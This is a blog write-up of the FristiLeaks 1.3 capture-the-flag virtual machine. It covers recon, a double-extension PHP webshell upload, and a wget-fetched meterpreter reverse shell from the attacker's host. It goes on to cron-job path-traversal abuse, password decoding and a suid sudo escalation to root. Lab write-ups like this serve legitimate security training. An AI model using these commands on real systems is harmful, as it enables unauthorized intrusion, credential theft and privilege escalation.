Thursday, December 24, 2015

FristiLeaks 1.3 writeup

You should know it, put somewhere a pink logo and I can't resist.
Downloaded and imported FristiLeaks 1.3 ova file, with a couple of hiccup because of vmware fusion STFU, runt nmap against it:
$ nmap -p- -A -v $IP



we can see that port 80 is open, site homepage says "drink fristi" and nothing more.

now nikto is my next step:
$ nikto -host $IP
[cut]
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
[cut]

I found it interesting that all the three directories are drinks and that homepage says drink fristi:
I tried to open also /fristi/, which give back an admin panel.


sqlmap is very cheap to run in background while you read source code, so I captured the POST request and passed to her even if in this case is useless.

homepage source code embed a base64 encoded string in a comment at the very bottom of the source, i pasted the code in file b to decode it:
$ base64 -D -i a -o b

then file b says that it's an image:


renaming it to b.png and opening it show us that this image is actually a string:


back to the source code we can see that the header report the name of the creator of the page:


with some guess I tried to login as eezeepz using the string token from the image as password, and bingo.

I'm now in front of a file upload form: time to fire up burp suite again and try to upload a webshell.
after a few minutes of unsuccessful try, from content/type to case mixup, from uncommon extension to good ol' nullbyte, i tried to upload a file with double extension to exploit a possible misconfiguration in Apache (see AddHandler/AddType) and bingo: shell.php.jpg gets executed as php code:


time to meterpreter the host, i download a php/meterpreter_reverse_tcp using wget visiting che url
http://$IP/fristi/uploads/shell.php.png?c=wget%20http://$ME/shell.txt%20-O%20shell.php

and executing it visiting http://$IP/fristi/uploads/shell.php

a quick view at docroot doesn't give me anything useful, even mysql database (cat checklogin.php) doesn't help me.

time to enumerate, /etc/passwd talks about four possible targets:
eezeepz:x:500:500::/home/eezeepz:/bin/bash
admin:x:501:501::/home/admin:/bin/bash
fristigod:x:502:502::/var/fristigod:/bin/bash
fristi:x:503:100::/var/www:/sbin/nologin

starting from fristi, who names the game, we can see a notes.txt file:


ok, eezeepz is also the "web developer", so i'm sure i'll find interesting stuff in his mess.

listing files i found another notes.txt:


so we can execute commands as admin, sum it up the requirements:
  • must start with /usr/bin/ or
  • must be in /home/admin/
i can't see what's in /home/admin so i have to trust that there are only chmod, df, cat, echo, ps, grep and egrep.
let's see if this works:
echo "/home/admin/echo \`whoami\`" > /tmp/runthis
chmod 755 /tmp/runthis


after a minute i can see /tmp/cronresult:


let's see if we can fool the check for ^/usr/bin/:
echo "/usr/bin/../../bin/ls -al" > /tmp/runthis
chmod 755 /tmp/runthis













cool!
df says we have space enough to copy /home/admin to /tmp, so:
echo "/usr/bin/../../bin/cp -R /home/admin /tmp/admin" > /tmp/runthis
echo "/home/admin/chmod -R 777 /tmp/admin" >> /tmp/runthis
chmod 755 /tmp/runthis

after less than a minute i see /tmp/admin:

remove /tmp/runthis to avoid it to run again with rm -f /tmp/runthis

so, cryptedpass.txt and cryptpass.py in the same place. no need to say what i would do.

cryptpass.py is very easy:


it takes a string, base64encode then rot13 from the end to the beginning.
the script that takes cryptedpass and decode it is:


both cryptedpass.txt and whoisyourgodnow.txt contain encrypted password

let's try some "su" with this two passwords against the username we found in /etc/passwd starting with a plain shell:
python -c 'import pty; pty.spawn("/bin/bash")'

i found that i can su as admin, but since i can execute command with that uid i don't care so much.
decoded password from whoisyourgodnow.txt let me to su as fristigod.

his home have interesting stuff:


cat .bash_history types herself:


great, the user can someway sudo. let's see what he can execute with sudo -l:


not so much apparently...but doCom is suid ;)


easy bet:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
replies with our beloved:
uid=0(root) gid=100(users) groups=100(users),502(fristigod)

time to get a shell:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

/root of course contains a .txt file with the flag:


and a message that has a typo, because this image is distributed as 1.3 and txt speaks of 1.0, but who cares? :)

thanks Ar0xA for letting me spend some time playin with this box

No comments:

Post a Comment